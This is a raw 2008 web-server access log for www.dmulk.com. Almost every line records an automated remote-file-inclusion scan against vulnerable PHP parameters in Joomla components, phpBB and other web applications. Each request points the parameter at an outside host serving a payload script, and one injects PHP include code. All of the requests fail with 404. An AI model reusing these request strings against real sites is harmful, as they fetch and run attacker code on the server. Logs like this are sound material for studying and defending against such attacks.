212.25.95.194 - - [16/Mar/2008:08:29:55 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:08:30:17 -0700] "GET /logs/access_080124.log//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:08:30:36 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:08:30:36 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:30:47 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:31:04 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:31:05 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:31:06 -0700] "GET /logs//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:31:06 -0700] "GET /logs/index.php?option=com_Exchange&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.23.227 - - [16/Mar/2008:08:31:08 -0700] "GET /bikes/GPS/ HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:08:31:10 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:08:31:30 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:08:31:36 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:37 -0700] "GET /logs/access_080211.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:37 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:38 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:41 -0700] "GET /logs/access_080211.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:41 -0700] "GET /logs/access_080117.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:31:42 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:31:47 -0700] "GET /logs/access_080131.log/index.php?pagina=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:31:47 -0700] "GET /index.php?pagina=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:31:47 -0700] "GET /logs/index.php?pagina=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.64.104 - - [16/Mar/2008:08:31:50 -0700] "GET /logs//login.php?dir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.64.104 - - [16/Mar/2008:08:31:50 -0700] "GET //login.php?dir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.128.49.197 - - [16/Mar/2008:08:31:52 -0700] "GET /logs/access_080207.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:32:03 -0700] "GET /logs/access_080211.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:32:04 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:32:04 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:32:08 -0700] "GET /logs/access_080117.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.140.58 - - [16/Mar/2008:08:32:09 -0700] "GET /index.php?pagina=http://200.220.159.91/~regina/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:32:10 -0700] "GET /logs/access_071229.log//components/com_minibb.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:32:10 -0700] "GET //components/com_minibb.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:32:10 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:29 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.114.4 - - [16/Mar/2008:08:32:29 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:29 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:30 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:44 -0700] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:44 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:32:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:33:02 -0700] "GET /logs/access_071229.log/werbungFrame.php?do=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:33:16 -0700] "GET /werbungFrame.php?do=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:33:29 -0700] "GET /logs/werbungFrame.php?do=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:33:32 -0700] "GET /logs/access_080204.log/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:08:33:35 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:34:01 -0700] "GET /logs/access_080117.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:34:01 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:34:02 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:34:21 -0700] "GET /logs/access_071225.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:34:30 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:34:31 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:08:34:31 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:34:40 -0700] "GET /logs/access_080211.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:34:40 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:34:40 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:34:42 -0700] "GET /logs/access_080117.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:35:48 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:35:48 -0700] "GET //components/minibb/index.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:35:48 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:35:49 -0700] "GET /logs/access_080211.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:35:49 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:35:50 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:35:51 -0700] "GET /logs/access_080117.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.95.194 - - [16/Mar/2008:08:36:21 -0700] "GET /logs/access_080124.log//modules/TotalCalendar/about.php?inc_dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:08:36:49 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:08:36:49 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:08:36:54 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:08:36:54 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.92.172.194 - - [16/Mar/2008:08:37:22 -0700] "GET /logs/access_080215.log//convert/mvcw.php?step=1&vwar_root=http://74.54.207.2/~cogu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:37:44 -0700] "GET /logs/access_080131.log/index.php?pag=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:37:44 -0700] "GET /index.php?pag=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:37:45 -0700] "GET /logs/index.php?pag=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.72.52 - - [16/Mar/2008:08:37:45 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://www.sel-de-re.tm.fr/boutique/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:37:45 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:37:46 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:37:47 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:37:47 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:37:47 -0700] "GET //index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:08:37:48 -0700] "GET /logs//index.php?pagina=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:22 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:23 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:23 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:38:24 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:38:35 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:38:41 -0700] "GET /logs/access_080126.log//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:38:42 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.155.27 - - [16/Mar/2008:08:38:42 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:47 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:48 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:38:49 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.179.41.165 - - [16/Mar/2008:08:38:56 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [16/Mar/2008:08:38:58 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.179.41.165 - - [16/Mar/2008:08:38:59 -0700] "GET /logs//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:38:59 -0700] "GET /logs/access_080228.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:39:00 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:08:39:00 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:40:00 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.51.67.30 - - [16/Mar/2008:08:40:05 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.179.41.165 - - [16/Mar/2008:08:40:05 -0700] "GET /logs/access_080117.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.49.197 - - [16/Mar/2008:08:40:08 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://veldega-tour.ru/.log/idscan2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:40:12 -0700] "GET /home.php?table=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:40:18 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:40:19 -0700] "GET /logs/access_080204.log/modify.php?dir_module=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:40:22 -0700] "GET /modify.php?dir_module=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:40:22 -0700] "GET /logs/access_080228.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.166.27 - - [16/Mar/2008:08:40:22 -0700] "GET /logs/modify.php?dir_module=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:08:40:24 -0700] "GET /logs/home.php?table=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:40:28 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:40:31 -0700] "GET //login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:40:49 -0700] "GET /logs/access_080228.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:40:50 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:40:50 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:41:02 -0700] "GET /logs/access_080228.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:41:02 -0700] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.96.80.40 - - [16/Mar/2008:08:41:02 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.192.194.21 - - [16/Mar/2008:08:41:12 -0700] "GET /logs/access_080211.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [16/Mar/2008:08:41:22 -0700] "GET /logs/access_071229.log//login.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
